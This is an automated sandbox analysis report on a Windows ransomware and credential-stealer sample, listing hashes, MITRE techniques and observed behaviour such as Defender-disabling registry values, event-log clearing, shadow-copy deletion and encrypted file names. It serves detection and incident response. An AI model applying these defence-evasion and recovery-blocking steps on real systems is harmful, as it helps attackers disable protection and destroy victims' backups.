af9e8f301a3677b457345921d7ee765a842eceb7df107714eaffc6193bfc6bbe

Analysis

max time kernel
148s
max time network
63s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
25/05/2023, 17:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Size

884KB
MD5

da13022097518d123a91a3958be326da
SHA1

24a71ab462594d5a159bbf176588af951aba1381
SHA256

25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5
SHA512

a82aa97a92cd21ee2d4b556448fd3293396eb7c01d3626ebdb6c3816277783578686830c430014b6b2fc3280bc1301df27da079937f88834c2d35641eb5fc26f
SSDEEP

12288:Sw41dVZvThPCsM18GLHe7wlDdkPAQEtxr0fflvRmhEBWtdUJiAUtP/T/kAfMvgVt:dod1HDmlDdkZ4YXPpaTTXMw

Score

10^/10

evasion ransomware spyware stealer trojan upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command-Line Interface

T1059

pid	Process
3504	MpCmdRun.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs 3 IoCs

evasion ransomware

Indicator Removal on Host

T1070

pid	Process
3692	wevtutil.exe
3944	wevtutil.exe
4848	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral7/memory/1012-121-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-122-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-123-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-124-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-126-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-235-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-728-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-1514-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-2208-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-3120-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-4498-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-4870-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-4871-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-5845-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-7514-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx
behavioral7/memory/1012-7515-0x0000000000AA0000-0x0000000000DB2000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME-JAVAFX.txt.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5m7mVYjPsv3LtuJLoDScNQW.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProMSDNR_Retail-ppd.xrm-ms.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5nW68MUPQ4vcaogTfGjM3EB.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\AFTRNOON.INF.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5njAV9SsM9EWqSBYipwcTBo.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.sad.scale-150.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Retail-pl.xrm-ms.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5lbhOcAAxxzQQr8vEO6KO0Q.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-80.png.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5nOGPkGujpoVTOaGqPCJmQN.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\197.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\ui-strings.js.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5l-DiL_MNPWDoOvqZF0oitu.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\Stationery\Green Bubbles.htm	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeLargeTile.scale-200.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xeccf.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\it-IT\msdaremr.dll.mui.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5n_ZBwRACEUcjxeU_JNbMg8.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\MainPageState2\freecell_bp_920.jpg	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5l-8zI3Ob36Wo6yn-8CR2dd.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\fr-FR\wmplayer.exe.mui	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fr-FR\FlickLearningWizard.exe.mui	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5nVUU6DSBG_Gzeqsco5yKA-.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-30_altform-unplated.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\LargeTile.scale-100.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7813_24x24x32.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\Stationery\Hand Prints.htm	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5lOtRHG6S3sVuhabrOha6h1.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5nS8b56foy6VpPZcxBDbg9z.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\CalculatorWideTile.contrast-black_scale-125.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\ui-strings.js.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5kLe4PPNLs5Xw1kkPy_8LEO.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-ppd.xrm-ms.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5nE-OfbPCOXY1CtqviI6us-.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\pizza.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\WorldClockSmallTile.contrast-white_scale-200.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CAPSULES\THMBNAIL.PNG.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5mOoDbGu-RhXM1jIU40LEQT.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-60_altform-unplated_contrast-white.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Common Files\System\ado\msado28.tlb	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\font\CameraSymbols.ttf	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-white\WideTile.scale-200.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-48_contrast-black.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\waiting.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreAppList.targetsize-20.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\en-US\msdaremr.dll.mui	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_Subscription-pl.xrm-ms.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5nle0KEjt9NPVPwnx65Kulh.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_2019.16112.11621.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5l_VZXdA1CNCXvRIzahhWx7.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\ui-strings.js.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5ngNH3Yk1SBORDymwJiGJlX.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Retail-ppd.xrm-ms.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5nstrtfqk4sNdj4Ak62zK83.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power View Excel Add-in\Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5kCwzuNsDswHV5plLczsMhV.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\web_documentcloud_logo.png.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5mNsbptwoWPYWwPeTDD8vBU.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProVL_MAK-ul-phn.xrm-ms.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5kD6cAbMw0SJtTDjR_c0gFB.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity-dark@4x.png.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5krhbmQWp-7RpuCzjQVIbQ3.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ir_60x42.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarWideTile.scale-150.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-cn\ui-strings.js.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5mijz0OreuhYxnDMuxdmnZn.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5mmI4n_SW0LLyVvx3YidnNO.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_OEM_Perp-ul-phn.xrm-ms.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5nPqrpU-npePOSSw6RbRnJT.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Grace-ppd.xrm-ms.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5lWFpzXCLLNe8xO-A92BNUl.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7813_40x40x32.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5m64h89WKGmXMeXwwjeCOFM.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\WordR_OEM_Perp-ul-phn.xrm-ms.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5niVVAYH6bKfSBIpg5TH64V.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\powerpnt.exe.manifest.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5l5tlHXS67CNNeMqmt8rKp_.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.contrast-black_targetsize-64.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions.png.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5kEnYzph1A0Pdqwa-Sc78Ih.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\logging.properties.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5n5TgjeUim9NOQCZD012ftP.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.bsv6-jkBGJQTBQQhtByYQav2oDSRc3KpbWaeB_j5A5n0WvD8R9NOVEvoQxV2wilP.uj1ps	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\contrast-black\WideTile.scale-125.png	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4936	sc.exe
4436	sc.exe
2604	sc.exe
4304	sc.exe
3336	sc.exe
4864	sc.exe
2632	sc.exe
4532	sc.exe
4364	sc.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4720	vssadmin.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3488	powershell.exe
3488	powershell.exe
3488	powershell.exe
2804	powershell.exe
2804	powershell.exe
2804	powershell.exe
1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
1012	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	4848	wevtutil.exe
Token: SeBackupPrivilege	4848	wevtutil.exe
Token: SeSecurityPrivilege	3692	wevtutil.exe
Token: SeBackupPrivilege	3692	wevtutil.exe
Token: SeSecurityPrivilege	3944	wevtutil.exe
Token: SeBackupPrivilege	3944	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	1252	wmic.exe
Token: SeSecurityPrivilege	1252	wmic.exe
Token: SeTakeOwnershipPrivilege	1252	wmic.exe
Token: SeLoadDriverPrivilege	1252	wmic.exe
Token: SeSystemProfilePrivilege	1252	wmic.exe
Token: SeSystemtimePrivilege	1252	wmic.exe
Token: SeProfSingleProcessPrivilege	1252	wmic.exe
Token: SeIncBasePriorityPrivilege	1252	wmic.exe
Token: SeCreatePagefilePrivilege	1252	wmic.exe
Token: SeBackupPrivilege	1252	wmic.exe
Token: SeRestorePrivilege	1252	wmic.exe
Token: SeShutdownPrivilege	1252	wmic.exe
Token: SeDebugPrivilege	1252	wmic.exe
Token: SeSystemEnvironmentPrivilege	1252	wmic.exe
Token: SeRemoteShutdownPrivilege	1252	wmic.exe
Token: SeUndockPrivilege	1252	wmic.exe
Token: SeManageVolumePrivilege	1252	wmic.exe
Token: 33	1252	wmic.exe
Token: 34	1252	wmic.exe
Token: 35	1252	wmic.exe
Token: 36	1252	wmic.exe
Token: SeIncreaseQuotaPrivilege	2700	wmic.exe
Token: SeSecurityPrivilege	2700	wmic.exe
Token: SeTakeOwnershipPrivilege	2700	wmic.exe
Token: SeLoadDriverPrivilege	2700	wmic.exe
Token: SeSystemProfilePrivilege	2700	wmic.exe
Token: SeSystemtimePrivilege	2700	wmic.exe
Token: SeProfSingleProcessPrivilege	2700	wmic.exe
Token: SeIncBasePriorityPrivilege	2700	wmic.exe
Token: SeCreatePagefilePrivilege	2700	wmic.exe
Token: SeBackupPrivilege	2700	wmic.exe
Token: SeRestorePrivilege	2700	wmic.exe
Token: SeShutdownPrivilege	2700	wmic.exe
Token: SeDebugPrivilege	2700	wmic.exe
Token: SeSystemEnvironmentPrivilege	2700	wmic.exe
Token: SeRemoteShutdownPrivilege	2700	wmic.exe
Token: SeUndockPrivilege	2700	wmic.exe
Token: SeManageVolumePrivilege	2700	wmic.exe
Token: 33	2700	wmic.exe
Token: 34	2700	wmic.exe
Token: 35	2700	wmic.exe
Token: 36	2700	wmic.exe
Token: SeIncreaseQuotaPrivilege	2700	wmic.exe
Token: SeSecurityPrivilege	2700	wmic.exe
Token: SeTakeOwnershipPrivilege	2700	wmic.exe
Token: SeLoadDriverPrivilege	2700	wmic.exe
Token: SeSystemProfilePrivilege	2700	wmic.exe
Token: SeSystemtimePrivilege	2700	wmic.exe
Token: SeProfSingleProcessPrivilege	2700	wmic.exe
Token: SeIncBasePriorityPrivilege	2700	wmic.exe
Token: SeCreatePagefilePrivilege	2700	wmic.exe
Token: SeBackupPrivilege	2700	wmic.exe
Token: SeRestorePrivilege	2700	wmic.exe
Token: SeShutdownPrivilege	2700	wmic.exe
